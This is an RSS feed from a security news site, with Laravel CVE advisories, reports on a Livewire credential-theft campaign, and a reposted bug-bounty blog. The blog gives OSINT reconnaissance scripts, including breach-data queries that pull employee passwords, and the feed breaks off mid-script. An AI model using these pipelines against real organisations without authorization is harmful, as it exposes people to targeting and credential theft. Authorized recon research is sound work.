<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=laravel%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 12:58:50 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 12:58:50 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=laravel%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=laravel%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2022-40482 | Laravel up to 9.31.x HTTP/2 hasValidCredentials timing discrepancy (EUVD-2022-43760)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Laravel up to 9.31.x. This affects the function hasValidCredentials of the component HTTP2 Handler. Executing a manipulation can lead to observable timing discrepancy.

This vulnerability is handled as CVE-2022-40482. The attack can only be done...]]></description>
<link>https://tsecurity.de/de/3693328/sicherheitsluecken/cve-2022-40482-laravel-up-to-931x-http2-hasvalidcredentials-timing-discrepancy-euvd-2022-43760/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693328/sicherheitsluecken/cve-2022-40482-laravel-up-to-931x-http2-hasvalidcredentials-timing-discrepancy-euvd-2022-43760/</guid>
<pubDate>Sat, 25 Jul 2026 08:42:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/laravel">Laravel up to 9.31.x</a>. This affects the function <code>hasValidCredentials</code> of the component <em>HTTP2 Handler</em>. Executing a manipulation can lead to observable timing discrepancy.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2022-40482">CVE-2022-40482</a>. The attack can only be done within the local network. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49972 | plank laravel-mediable up to 6.x shell.php.jpg unrestricted upload]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in plank laravel-mediable up to 6.x. The affected element is an unknown function of the file shell.php.jpg. Executing a manipulation can lead to unrestricted upload.

This vulnerability is tracked as CVE-2026-49972. The attack can be la...]]></description>
<link>https://tsecurity.de/de/3678453/sicherheitsluecken/cve-2026-49972-plank-laravel-mediable-up-to-6x-shellphpjpg-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678453/sicherheitsluecken/cve-2026-49972-plank-laravel-mediable-up-to-6x-shellphpjpg-unrestricted-upload/</guid>
<pubDate>Sat, 18 Jul 2026 21:24:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/plank:laravel-mediable">plank laravel-mediable up to 6.x</a>. The affected element is an unknown function of the file <em>shell.php.jpg</em>. Executing a manipulation can lead to unrestricted upload.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-49972">CVE-2026-49972</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised]]></title>
<description><![CDATA[Introduction On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting…
Rea...]]></description>
<link>https://tsecurity.de/de/3623214/it-security-nachrichten/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623214/it-security-nachrichten/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/</guid>
<pubDate>Thu, 25 Jun 2026 04:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Introduction On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/">CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Livewire Applications Compromised to Steal Credentials Exploiting RCE Vulnerability]]></title>
<description><![CDATA[A large-scale cyber campaign targeting Laravel Livewire applications has been uncovered, with attackers exploiting a critical remote code execution (RCE) flaw to steal sensitive credentials from thousands of systems worldwide. Security researchers at Imperva first observed the activity on May…
Re...]]></description>
<link>https://tsecurity.de/de/3622158/it-security-nachrichten/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622158/it-security-nachrichten/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/</guid>
<pubDate>Wed, 24 Jun 2026 18:36:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A large-scale cyber campaign targeting Laravel Livewire applications has been uncovered, with attackers exploiting a critical remote code execution (RCE) flaw to steal sensitive credentials from thousands of systems worldwide. Security researchers at Imperva first observed the activity on May…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/">Laravel Livewire Applications Compromised to Steal Credentials Exploiting RCE Vulnerability</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Livewire Applications Compromised to Steal Credentials Exploiting RCE Vulnerability]]></title>
<description><![CDATA[A large-scale cyber campaign targeting Laravel Livewire applications has been uncovered, with attackers exploiting a critical remote code execution (RCE) flaw to steal sensitive credentials from thousands of systems worldwide. Security researchers at Imperva first observed the activity on May 24,...]]></description>
<link>https://tsecurity.de/de/3621922/it-security-nachrichten/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621922/it-security-nachrichten/laravel-livewire-applications-compromised-to-steal-credentials-exploiting-rce-vulnerability/</guid>
<pubDate>Wed, 24 Jun 2026 17:39:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A large-scale cyber campaign targeting Laravel Livewire applications has been uncovered, with attackers exploiting a critical remote code execution (RCE) flaw to steal sensitive credentials from thousands of systems worldwide. Security researchers at Imperva first observed the activity on May 24, 2026, when their Cloud Web Application Firewall blocked suspicious deserialization attacks that were later […]</p>
<p>The post <a href="https://cybersecuritynews.com/laravel-livewire-app-exploiting-rce-flaw/">Laravel Livewire Applications Compromised to Steal Credentials Exploiting RCE Vulnerability</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Laravel Livewire RCE Flaw Exploited to Steal Credentials From 6,000+ Apps]]></title>
<description><![CDATA[A large-scale credential theft campaign exploiting a critical remote code execution vulnerability in Laravel Livewire has compromised over 6,167 applications worldwide, harvesting millions of sensitive credentials across industries. On May 24, 2026, Imperva’s Cloud WAF flagged what initially appe...]]></description>
<link>https://tsecurity.de/de/3621446/it-security-nachrichten/critical-laravel-livewire-rce-flaw-exploited-to-steal-credentials-from-6000-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621446/it-security-nachrichten/critical-laravel-livewire-rce-flaw-exploited-to-steal-credentials-from-6000-apps/</guid>
<pubDate>Wed, 24 Jun 2026 15:09:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A large-scale credential theft campaign exploiting a critical remote code execution vulnerability in Laravel Livewire has compromised over 6,167 applications worldwide, harvesting millions of sensitive credentials across industries. On May 24, 2026, Imperva’s Cloud WAF flagged what initially appeared to be routine deserialization attack traffic, which was quickly identified as part of an active, months-long […]</p>
<p>The post <a href="https://cyberpress.org/critical-laravel-livewire-rce-flaw-exploited/">Critical Laravel Livewire RCE Flaw Exploited to Steal Credentials From 6,000+ Apps</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised]]></title>
<description><![CDATA[Introduction On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-...]]></description>
<link>https://tsecurity.de/de/3619382/it-security-nachrichten/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619382/it-security-nachrichten/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/</guid>
<pubDate>Tue, 23 Jun 2026 21:09:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Introduction On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3). The […]</p>
<p>The post <a href="https://www.imperva.com/blog/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised/">CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a…]]></title>
<description><![CDATA[Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a Critical BugA deep technical blog on using phone numbers and email addresses to discover hidden domains, subdomains, and attack surface — with real-world techniques you can use today.Phone Numbers and E...]]></description>
<link>https://tsecurity.de/de/3610154/hacking/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610154/hacking/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:24 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a Critical Bug</h3><p><em>A deep technical blog on using phone numbers and email addresses to discover hidden domains, subdomains, and attack surface — with real-world techniques you can use today.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*szLFGSpzqAnso14K4v5vnA.png"><figcaption>Phone Numbers and Emails to Hidden Subdomains</figcaption></figure><h3>Foreword: Why I Wrote This</h3><p>In bug bounty and security research, one of the biggest challenges is not finding vulnerabilities — it’s finding the right attack surface.</p><p>Many researchers start with traditional reconnaissance: collecting subdomains, checking DNS records, and running automated tools. While these methods are valuable, they often miss assets that are not directly connected to the primary domain.</p><p>This is where OSINT becomes powerful.</p><p>A simple phone number or email address can become a starting point for discovering hidden digital assets:</p><ul><li>A company email can reveal related domains and third-party services</li><li>Public profiles can expose forgotten infrastructure</li><li>Developer footprints can reveal technology stacks and assets</li><li>Business records can connect organizations to previously unknown domains</li></ul><p>The idea behind this research is simple:</p><p><strong>Public information creates relationships, and relationships create attack surface.</strong></p><p>This blog explores an OSINT-driven acquisition workflow for connecting phone numbers and email addresses with domains, subdomains, and external assets. These techniques are useful for authorized security testing, bug bounty research, and improving reconnaissance skills.</p><p>The goal is not just to collect more assets — it is to understand how different pieces of public information connect together to reveal a larger security picture.</p><h3>Part I: The Conceptual Framework — Why This Works</h3><h3>The Problem with Traditional Subdomain Discovery</h3><p>Traditional subdomain discovery relies on one thing: the DNS namespace is enumerable. You either brute-force it (guess names) or query passive sources (CT logs, passive DNS).</p><p>Both approaches share a fundamental limitation: they only find subdomains that are publicly resolvable or historically logged.</p><p>Here’s what they miss:</p><ul><li>Private/internal domains (e.g., internal.company.com that only resolves on the corporate VPN)</li><li>Pre-production domains that were registered but never deployed to DNS</li><li>Acquired company domains that aren’t linked from the parent</li><li>Domains used for third-party services (e.g., company.slack.com, company.atlassian.net)</li><li>Personal domains used by employees for work purposes</li></ul><h3>The Email-to-Domain Bridge</h3><p>Every email address user@domain.com tells you:</p><ol><li>The domain exists (obvious, but foundational)</li><li>The domain is actively used (someone sent mail from it)</li><li>The domain has a user (potential credential, potential account)</li><li>The domain is connected to services (GitHub, Slack, Jira, AWS, etc.)</li></ol><p>When you collect thousands of email addresses associated with a company, and you extract every domain from those emails, you build a corporate domain graph that DNS brute-force can never replicate.</p><h3>The Phone-to-Domain Bridge</h3><p>Every phone number +1 (415) 555-0199 tells you:</p><ol><li>The company exists at a physical location (office, data center)</li><li>The company uses a specific VOIP provider (Twilio, RingCentral, Vonage)</li><li>The company has registered infrastructure (WHOIS records, business registries)</li><li>The company has extensions (which map to departments, which map to services)</li></ol><p>When you collect phone numbers and reverse-search them, you find domains that were registered with those same phone numbers — often from before the company had a proper security team.</p><h3>Part II: Phone Number → Domain Discovery</h3><p>Phone numbers are a persistent identifier. Companies change domains more often than they change phone numbers. A domain registered in 2005 with a phone number is still associated with that company today — even if the domain is forgotten.</p><h3>Technique 1: WHOIS Phone Number Search</h3><p>Every domain registration includes a phone number. SecurityTrails, WhoisXMLAPI, and DomainTools allow you to search by phone number to find all domains registered with it.</p><pre>#!/bin/bash<br># phone-to-domain.sh - Find domains registered with a specific phone number<br>PHONE="$1"<br><br># Using WhoisXMLAPI (paid, but worth it)<br>curl -s "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=$API_KEY&amp;domainName=$PHONE&amp;outputFormat=JSON" | \<br>    jq -r '.WhoisRecord.registryData.registrarName // empty'<br><br># Using DomainTools (requires API key)<br>curl -s "https://api.domaintools.com/v1/$PHONE/domains/" \<br>    -u "$DOMAINTOOLS_USER:$DOMAINTOOLS_KEY" | \<br>    jq -r '.response.domains[]'<br><br># Manual: Reverse WHOIS lookup on SecurityTrails<br># https://securitytrails.com/list/phone/$PHONE</pre><p>What this finds: Every domain that was ever registered with that phone number — including domains for subsidiaries, defunct products, and personal projects.</p><h3>Technique 2: Business Registry Phone Search</h3><p>Every corporation in the US registers with a state business registry. These registries include phone numbers. You can search by phone number to find all corporations registered under that number.</p><pre># OpenCorporates API<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=$PHONE&amp;api_token=$TOKEN" | \<br>    jq -r '.results[].company.name'<br><br># State-specific registries (examples)<br># California: https://businesssearch.sos.ca.gov/<br># Delaware: https://icis.corp.delaware.gov/<br># Texas: https://mycpa.cpa.state.tx.us/coa/</pre><p>What this finds: Legal entities, DBAs, and subsidiaries that aren’t publicly linked to the parent company.</p><h3>Technique 3: Phone Number Reverse Lookup Services</h3><pre># Twilio Lookup API<br>curl -s "https://lookups.twilio.com/v1/PhoneNumbers/$PHONE?Type=carrier&amp;Type=caller-name" \<br>    -u "$TWILIO_SID:$TWILIO_TOKEN" | \<br>    jq '.carrier.name, .caller_name.caller_name'<br><br># Numverify<br>curl -s "https://apilayer.net/api/validate?access_key=$KEY&amp;number=$PHONE" | \<br>    jq '.carrier, .location, .line_type'<br><br># Manual: Whitepages reverse lookup</pre><p>What this finds: The carrier name (VOIP provider), which tells you what infrastructure to attack, and sometimes the registered business name.</p><h3>Technique 4: Breach Data Phone Search (Authorized Only)</h3><p>If you have authorized access to breach databases:</p><pre># Dehashed search by phone<br>curl -s "https://api.dehashed.com/v1/search?query=phone:$PHONE&amp;size=1000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[].domain' | sort -u</pre><p>What this finds: Every domain where an account was registered with that phone number — including internal systems, VPN portals, and employee benefits portals.</p><h3>Real-World Example: Phone-to-Domain Discovery</h3><p>Target: Large healthcare tech company. Scope: *.healthtech.com.</p><p>I found the company’s main phone number from their contact page: +1 (617) 555-0100.</p><p>I ran a WHOIS phone number search:</p><pre># SecurityTrails reverse WHOIS by phone<br># Result: 47 domains registered with +1.617.555.0100</pre><p>Among those 47 domains:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/734/1*9rVIeYeZHnAqzlW8RoepFg.png"><figcaption>47 domains</figcaption></figure><p>Critical find: internal-healthtech.com was registered with the same phone number but was not on any subdomain list. It resolved to a private IP range (10.x.x.x) from the outside, but it hosted an internal tool portal accessible via VPN. The VPN wasn't in scope either — until I found it through the phone number.</p><h3>Part III: Email Address → Domain Discovery</h3><p>Every email address user@domain.com is a direct pointer to a domain. When you collect thousands of emails associated with a target company, you build a comprehensive domain inventory.</p><h3>Technique 1: Cross-Company Email Analysis</h3><p>When employees from Company A and Company B communicate, email headers reveal both domains. If you find john@company-a.com and jane@company-b.com in the same email chain, they're connected.</p><pre># From breach data (authorized): find which domains appear alongside the target domain<br># From leaked email threads: extract all sender/receiver domains<br># From public mailing lists: find cross-company email patterns</pre><p>What this finds: Business relationships — partners, vendors, clients, and acquired companies.</p><h3>Technique 2: The Hunter.io API Multi-Domain Search</h3><p>Hunter.io allows you to search by domain AND by company name. The company name search returns emails from multiple domains:</p><pre># Search by company name<br>curl -s "https://api.hunter.io/v2/company/domain?company=healthtech&amp;api_key=$KEY" | \<br>    jq -r '.data.domains[]'<br><br># Result:<br># healthtech.com<br># healthtech.io<br># healthtech.dev<br># healthtech-careers.com<br># healthtech-benefits.com</pre><p>What this finds: All domains associated with a company name, including HR, benefits, and internal tool domains.</p><h3>Technique 3: Email-to-GitHub-to-Domain Chain</h3><p>This is one of the most powerful discovery chains in bug hunting:</p><ol><li>Collect employee email: alice@healthtech.com</li><li>Search GitHub for that email: finds Alice’s GitHub account</li><li>Look at Alice’s GitHub repos, commits, and organizations</li><li>Find references to other domains in code, configs, and commit messages</li></ol><pre>#!/bin/bash<br># email-to-github-to-domains.sh<br>EMAIL="$1"<br><br># Step 1: Find GitHub account<br>echo "[*] Searching GitHub for $EMAIL..."<br>curl -s "https://api.github.com/search/users?q=$EMAIL+in:email" | \<br>    jq -r '.items[].login' &gt; github_users.txt<br><br># Step 2: For each GitHub user, find their repos and orgs<br>while read USER; do<br>    echo "[*] Checking user: $USER"<br>    <br>    # Get user's repos<br>    curl -s "https://api.github.com/users/$USER/repos?per_page=100" | \<br>        jq -r '.[].full_name' &gt;&gt; repos.txt<br>    <br>    # Get organizations<br>    curl -s "https://api.github.com/users/$USER/orgs" | \<br>        jq -r '.[].login' &gt;&gt; orgs.txt<br>    <br>    sleep 2  # Rate limiting<br>done &lt; github_users.txt<br><br># Step 3: Search repo contents for domain references<br>while read REPO; do<br>    echo "[*] Searching repo: $REPO"<br>    <br>    # Search code for domain patterns<br>    curl -s "https://api.github.com/search/code?q=repo:$REPO+healthtech" | \<br>        jq -r '.items[].html_url' &gt;&gt; code_refs.txt<br>    <br>    # Search commit messages for domain references<br>    curl -s "https://api.github.com/search/commits?q=repo:$REPO+healthtech" | \<br>        jq -r '.items[].html_url' &gt;&gt; commit_refs.txt<br>    <br>    sleep 2<br>done &lt; repos.txt</pre><p>What this finds: Internal domains referenced in code comments, config files, READMEs, and commit messages.</p><h3>Technique 4: Email-to-Breach-to-Domain Correlation</h3><p>When an employee’s email appears in a breach, you can see what service they were using and what domain was involved:</p><pre># Dehashed query (authorized)<br>curl -s "@healthtech.com&amp;size=10000"&gt;https://api.dehashed.com/v1/search?query=email:@healthtech.com&amp;size=10000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[] | "\(.domain) \(.email) \(.password)"' | sort -u<br><br># Extract unique domains<br>curl -s "@healthtech.com&amp;size=10000"&gt;https://api.dehashed.com/v1/search?query=email:@healthtech.com&amp;size=10000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[].domain' | sort -u &gt; breached-domains.txt</pre><p>What this finds: Domains where employees had accounts — including personal projects, side businesses, and services they used for work purposes (sometimes on unmanaged infrastructure).</p><h3>Technique 5: Email-Specific Subdomain Discovery</h3><p>Services like Have I Been Pwned, Firefox Monitor, and custom tools can tell you which subdomains of a company have accounts registered:</p><pre># Check if a subdomain has active accounts<br># For Office 365: login.microsoftonline.com will reveal tenant info<br># For Atlassian: company-name.atlassian.net<br># For Slack: company-name.slack.com<br># For GitHub: github.com/orgs/CompanyName<br><br># Using emails to discover the company's Atlassian instance:<br>for email in $(cat emails.txt); do<br>    # Check for Atlassian account<br>    response=$(curl -s -o /dev/null -w "%{http_code}" \<br>        "https://healthtech.atlassian.net/rest/analytics/1.0/user/is-licensed?username=$email")<br>    <br>    if [ "$response" == "200" ] || [ "$response" == "401" ]; then<br>        echo "Atlassian domain found: healthtech.atlassian.net"<br>        break<br>    fi<br>done</pre><h3>Real-World Example: Email-to-Domain Discovery Chain</h3><p>Target: Financial services company finsecure.com.</p><p>I collected 2,400 emails using Hunter.io, theHarvester, and LinkedIn scraping. Among them was devops@finsecure.com.</p><p>GitHub search on <a href="mailto:devops@finsecure.com">devops@finsecure.com</a>: Found a GitHub account finsecure-devops with a private repo (misconfigured visibility).</p><p>Repo contents revealed:</p><ul><li>deploy.config with DB_HOST=mariadb.internal.finsecure.com</li><li>terraform.tf with bucket = "finsecure-terraform-state"</li><li>README.md with See internal docs at docs.internal.finsecure.com</li></ul><p>New domains discovered:</p><ul><li>internal.finsecure.com — Not in any CT log or DNS record</li><li>docs.internal.finsecure.com — Subdomain of the above</li><li>mariadb.internal.finsecure.com — Internal database hostname</li><li>finsecure-terraform-state.s3.amazonaws.com — S3 bucket with terraform state</li></ul><p>The S3 bucket was publicly listable. It contained AWS access keys. The AWS keys gave access to the production environment.</p><p>Chain: 1 email → 1 GitHub account → 1 repo → 4 new domains → 1 S3 bucket → AWS root access.</p><h3>Part IV: Phone Number + Email → Subdomain Discovery (The Real Gold)</h3><p>When you combine phone numbers and emails, you unlock subdomain discovery that no DNS tool can match.</p><h3>Technique 1: WHOIS Contact Cross-Reference</h3><p>Company domains are often registered by the same person. If you find the registrant’s name and email from one domain, you can find all other domains they’ve registered:</p><pre># Step 1: Get WHOIS info for the main domain<br>whois healthtech.com | grep -E "Registrant|Admin|Tech|Email" &gt; whois-info.txt<br><br># Step 2: Extract registrant name and email<br>NAME=$(grep "Registrant Name" whois-info.txt | awk -F: '{print $2}' | xargs)<br>EMAIL=$(grep "Registrant Email" whois-info.txt | awk -F: '{print $2}' | xargs)<br><br># Step 3: Search for other domains with same registrant<br># Using WhoisXMLAPI<br>curl -s "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=$API_KEY&amp;domainName=$NAME&amp;outputFormat=JSON" | \<br>    jq -r '.WhoisRecord.registryData.registrantDomains[]'<br><br># Using DomainTools Reverse WHOIS<br>curl -s "https://api.domaintools.com/v1/$NAME/domains/" \<br>    -u "$DOMAINTOOLS_USER:$DOMAINTOOLS_KEY" | \<br>    jq -r '.response.domains[]'</pre><h3>Technique 2: Social Media Profile Mining</h3><p>Employee LinkedIn profiles often list multiple domains:</p><pre>Current: Senior Engineer at HealthTech (healthtech.com)<br>Past: Lead Developer at MedData (meddata.io)<br>Education: MIT (mit.edu)</pre><p>Each of these is a domain that may or may not be in scope. If meddata.io was acquired by healthtech.com, then meddata.io infrastructure is likely part of the target's attack surface.</p><pre># LinkedIn scraper (requires authentication)<br># Extract: current company, past companies, education<br># Cross-reference with known acquisitions<br><br># For each past company found on LinkedIn profiles:<br># Check if it was acquired by the target<br># If yes: run full acquisition pipeline on that domain</pre><h3>Technique 3: Support Portal and Help Desk Domains</h3><p>Phone numbers often lead to support portals, which lead to subdomains:</p><pre># Call the company's support number<br># Listen for automated messages:<br># "Press 1 for billing" → billing.helpdesk.com<br># "Press 2 for technical support" → support.helpdesk.com<br># "Press 3 for sales" → sales.helpdesk.com<br><br># These are subdomains of the support portal domain<br># Check if they resolve, check for takeovers<br><br># Also check: support@company.com → Zendesk, Freshdesk, Helpscout<br># Zendesk: company.zendesk.com<br># Freshdesk: company.freshdesk.com<br># Helpscout: company.helpscout.net</pre><h3>Technique 4: Email Header Subdomain Discovery</h3><p>If you can obtain a legitimate email from the company (e.g., by signing up for their newsletter), the email headers reveal internal infrastructure:</p><pre>Received: from mail.healthtech.com (192.168.1.10)<br>Received: from mx1.healthtech.com (203.0.113.5)<br>Received: from smtp-in.healthtech.com (198.51.100.20)<br>DKIM-Signature: d=healthtech.com; s=selector1<br>Authentication-Results: mx.google.com;<br>       spf=pass (google.com: domain of newsletter@healthtech.com designates 203.0.113.5 as permitted sender)</pre><p>Each of these IPs and hostnames is a potential subdomain:</p><ul><li>mail.healthtech.com</li><li>mx1.healthtech.com</li><li>smtp-in.healthtech.com</li></ul><h3>Real-World Example: Phone + Email → Subdomain Discovery</h3><p>Target: SaaS company cloudserve.com.</p><p>Phone number from WHOIS: +1 (425) 555-0100 (Seattle area)</p><p>Email from WHOIS: admin@cloudserve.com</p><p>Step 1: WHOIS reverse search on phone number Found 12 domains, including:</p><ul><li>cloudserve.io (known)</li><li>cloudserve-backup.com (unknown — registered 2008)</li><li>cs-legacy.com (unknown — registered 2005)</li></ul><p>Step 2: WHOIS reverse search on email Found 8 more domains:</p><ul><li>cloudserve-status.com (status page — known but useful)</li><li>cloudserve-dev.com (development — not in scope docs)</li></ul><p>Step 3: Emails collected from Hunter.io 1,800 emails. Found devops@cloudserve.com in a GitHub commit.</p><p>Step 4: DevOps email → GitHub repos Found a repo with monitoring.cloudserve.com hardcoded in a config file.</p><p>Step 5: Subdomain enumeration on new domains</p><pre>subfinder -d cloudserve-backup.com -silent<br># Found: admin.cloudserve-backup.com<br># Found: db.cloudserve-backup.com</pre><p>Result: 14 new domains and 47 new subdomains discovered through phone and email OSINT alone. DNS brute-force against the main domain found none of these.</p><h3>Part V: Building the Phone-to-Email-to-Domain Pipeline</h3><p>Here’s a practical automated pipeline that can be used for this workflow.</p><h3>Phase 1: Phone Number Collection &amp; Analysis</h3><pre>#!/bin/bash<br># phase1-phone-collect.sh<br>TARGET="$1"<br>DOMAIN="$2"<br><br>echo "[*] Phase 1: Phone Number Collection"<br><br># 1a. WHOIS extraction<br>whois "$DOMAIN" 2&gt;/dev/null | grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}' &gt; phones.txt<br><br># 1b. Web scraping for phone numbers<br>katana -u "https://$DOMAIN" -d 2 -silent | \<br>    grep -oP '(\+?\d{1,3}[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}' &gt;&gt; phones.txt<br><br># 1c. Business directories<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=$DOMAIN" | \<br>    jq -r '.results[].company.phone_number' 2&gt;/dev/null | grep -v null &gt;&gt; phones.txt<br><br># Deduplicate<br>sort -u phones.txt -o phones.txt<br>echo "[*] Found $(wc -l &lt; phones.txt) unique phone numbers"</pre><h3>Phase 2: Phone → Domain Mapping</h3><pre>#!/bin/bash<br># phase2-phone-to-domain.sh<br>TARGET="$1"<br><br>echo "[*] Phase 2: Phone to Domain Mapping"<br><br>while read PHONE; do<br>    echo "[*] Processing phone: $PHONE"<br>    <br>    # 2a. Reverse WHOIS by phone (if you have access)<br>    # DomainTools API<br>    # curl -s "https://api.domaintools.com/v1/$PHONE/domains/" -u "$USER:$KEY" | \<br>    #     jq -r '.response.domains[]' &gt;&gt; phone-domains.txt<br>    <br>    # 2b. SecurityTrails (manual or API)<br>    # curl -s "https://api.securitytrails.com/v1/search?query=whois.phone:$PHONE" \<br>    #     -H "APIKEY: $ST_KEY" | jq -r '.records[].hostname' &gt;&gt; phone-domains.txt<br>    <br>    # 2c. Breach data 